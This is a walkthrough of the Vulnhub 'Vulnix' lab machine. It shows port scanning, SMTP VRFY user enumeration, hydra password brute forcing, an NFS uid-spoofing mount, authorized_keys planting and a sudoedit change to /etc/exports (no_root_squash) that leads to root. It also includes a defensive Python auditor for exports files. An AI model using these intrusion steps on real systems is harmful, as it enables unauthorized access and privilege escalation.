Vulnhub Vulnix
Another day, another machine. Let’s start with our nmap scan.
nmap -A -sC -sS -T 4 -p- -PN
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-23 10:36 EDT
Nmap scan report for vulnix (192.168.1.114)
Host is up (0.00037s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after: 2022-08-31T17:40:12
|_ssl-date: 2017-05-24T00:59:38+00:00; +10h21m21s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL STLS CAPA PIPELINING UIDL TOP RESP-CODES
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2017-05-24T00:59:37+00:00; +10h21m22s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
|
143/tcp open imap Dovecot imapd
|_imap-capabilities: have SASL-IR IMAP4rev1 more ID LOGIN-REFERRALS LITERAL+ IDLE post-login listed capabilities Pre-login OK LOGINDISABLEDA0001 STARTTLS ENABLE
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2017-05-24T00:59:38+00:00; +10h21m21s from scanner time.
512/tcp open exec?
513/tcp open login
514/tcp open tcpwrapped
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: have SASL-IR IMAP4rev1 ID LOGIN-REFERRALS LITERAL+ IDLE more post-login listed capabilities Pre-login AUTH=PLAINA0001 OK ENABLE
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2017-05-24T00:59:38+00:00; +10h21m22s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER CAPA PIPELINING UIDL TOP RESP-CODES
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2017-05-24T00:59:38+00:00; +10h21m22s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
35665/tcp open status 1 (RPC #100024)
36639/tcp open mountd 1-3 (RPC #100005)
36648/tcp open nlockmgr 1-4 (RPC #100021)
49373/tcp open mountd 1-3 (RPC #100005)
59566/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:B8:37:0C (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 10h21m21s, deviation: 0s, median: 10h21m21s
Well, we have a lot of stuff going on.
The description of the box mentions that the way in is a service misconfiguration rather than an exploit.
I started by enumerating users.
SMTP
I started by connecting to port 25. Seeing that it accepts the VRFY command, I’ll try the obvious users.
ncat 192.168.1.114 25
220 vulnix ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY vulnix
252 2.0.0 vulnix
VRFY something
550 5.1.1 <something>: Recipient address rejected: User unknown in local recipient table
We know for sure that we have at least root and vulnix as users. Since SSH is open, I’ll start a hydra bruteforce against the user vulnix, just in case.
hydra -l vulnix -P ~/git/SecLists/Passwords/500-worst-passwords.txt 192.168.1.114 ssh -t 4
And nothing, even with a bigger password list.
Another service that piqued my interest was NFS.
NFS
After a quick Google search, I found that an NFS misconfiguration can allow anyone to mount the shared folder.
First we need to find out which folders are being exported.
showmount -e 192.168.1.114
Export list for 192.168.1.114:
/home/vulnix *
We can see that /home/vulnix is being shared. Let’s mount it.
mount -t nfs 192.168.1.114:/home/vulnix /mnt
drwxr-x--- 2 nobody 4294967294 4.0K Sep 2 2012 mnt
The mount works, but the permissions don’t: the directory is owned by an uid my account can’t match, so I can’t access it. It half works.
Hydra
Since the vulnix password wasn’t bruteforceable, I turned to hydra to find more usernames. I’ll try to enumerate users via SMTP and rsh.
hydra -L ~/git/SecLists/Usernames/top_shortlist.txt 192.168.1.114 rsh
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 19:46:14
[DATA] max 11 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1), ~0 tries per task
[DATA] attacking service rsh on port 514
[514][rsh] host: 192.168.1.114 login: user
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 19:46:14
hydra -L ~/git/SecLists/Usernames/top_shortlist.txt 192.168.1.114 smtp-enum
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 19:48:16
[DATA] max 11 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1), ~0 tries per task
[DATA] attacking service smtp-enum on port 25
[25][smtp-enum] host: 192.168.1.114 login: root
[25][smtp-enum] host: 192.168.1.114 login: user
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 19:48:17
Alright, there’s a user named user. Let’s try to bruteforce that one.
hydra -l user -P ~/git/SecLists/Passwords/500-worst-passwords.txt 192.168.1.114 ssh
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 19:50:46
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 499 login tries (l:1/p:499), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.114 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 19:51:02
And that was fast: user:letmein.
Enumeration
We’re in. Usually I would have looked at the kernel, but this machine is all about misconfigurations. Let’s look at the other services and search for keywords; rsh, for instance, has to have an .rhosts file somewhere.
The first thing I decided to look at was /etc/passwd, because I know there’s an NFS share of the user vulnix’s home. I wondered whether creating the same user with the same uid on my Kali box would make the mount work correctly.
The uid is 2008.
useradd vulnix -u 2008
mount -o nolock -t nfs 192.168.1.114:/home/vulnix /mnt
su vulnix
cd /mnt
ls -lha
drwxr-x--- 2 vulnix vulnix 4.0K May 24 2017 .
drwxr-xr-x 21 root root 4.0K May 17 23:26 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3.5K Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
Well, that was underwhelming. There’s nothing good. Oh shit, but wait: I could set up my own SSH key to ssh into it without a password!
Well, shit! I have no space to create anything on that machine. I guess the logs filled the hard drive completely. I tried deleting stuff, but nada!
So I had to reinitialise the machine. I redownloaded the whole machine and set it up again.
And it worked. Man, that sucked: I lost an hour trying to figure out how to get some free space.
mkdir .ssh
cd .ssh
echo "the public key" > authorized_keys
Vulnix user
So, as the vulnix user, let’s look at the sudo rights.
sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
Alright, we can run a command as root. I guess I could export root’s folder and repeat the steps we did with vulnix.
We’ll add the line /root *(rw,no_root_squash) after the /home/vulnix line.
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)
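Added here as a defender’s check, not part of the original writeup: a small exports(5) parser that flags the conditions the two exports above rely on (wildcard hosts, no_root_squash, and rw exports that trust client uids). The sample file content is constructed, and the finding tags and the space-before-options check are mine.

```python
import re

# Constructed sample in exports(5) syntax: the two lines from this walkthrough
# plus a hardened entry added for contrast.
SAMPLE_EXPORTS = """\
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)
/srv/share 192.168.1.0/24(ro,root_squash,all_squash)
"""
# A client spec is host(opt,...) or a bare host, which gets the ro,root_squash defaults.
CLIENT_RE = re.compile(r'(\S+?)\(([^)]*)\)|(\S+)')

def parse_exports(text):
    """Return [(path, [(host, [options]), ...]), ...] for each non-comment line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else '')
        clients = []
        for m in CLIENT_RE.finditer(rest):
            if m.group(1) is not None:
                host, opts = m.group(1), m.group(2).split(',')
            else:
                host, opts = m.group(3), []
            clients.append((host, [o.strip() for o in opts if o.strip()]))
        entries.append((path, clients))
    return entries

def audit_exports(text):
    """Flag the conditions this box relies on; returns [(path, host, tag), ...]."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            if host == '*':  # mountable from any client, as showmount -e showed
                findings.append((path, host, 'any_host'))
            if host.startswith('('):  # "host (opts)": the space applies opts to everyone
                findings.append((path, host, 'space_before_options'))
            if 'no_root_squash' in opts:  # client root keeps uid 0 on the server
                findings.append((path, host, 'no_root_squash'))
            if 'rw' in opts and 'all_squash' not in opts:
                # root_squash only remaps uid 0; a client user created with uid 2008
                # is trusted as vulnix, which is how the authorized_keys drop worked
                findings.append((path, host, 'rw_trusts_client_uids'))
    return findings
```

Run it against a real /etc/exports with `audit_exports(open('/etc/exports').read())`; an empty list is the result you want on a box that is not meant to be this one.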
We’ll reboot the machine. After that, on our Kali machine, we’ll look for the NFS exports again.
showmount -e 192.168.1.135
Export list for 192.168.1.135:
/root *
/home/vulnix *
Looks like it worked. Let’s mount it.
mount -t nfs -o nolock 192.168.1.135:/root /mnt
cd /mnt
ls -lha
total 28K
drwx------ 3 root root 4.0K Sep 2 2012 .
drwxr-xr-x 21 root root 4.0K May 17 23:26 ..
-rw------- 1 root root 0 Sep 2 2012 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc
drwx------ 2 root root 4.0K Sep 2 2012 .cache
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
-r-------- 1 root root 33 Sep 2 2012 trophy.txt
-rw------- 1 root root 710 Sep 2 2012 .viminfo
cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
mkdir .ssh
cd .ssh
echo "publickeystuff" > authorized_keys
We can now ssh in as root.
ssh root@192.168.1.135
id
uid=0(root) gid=0(root) groups=0(root)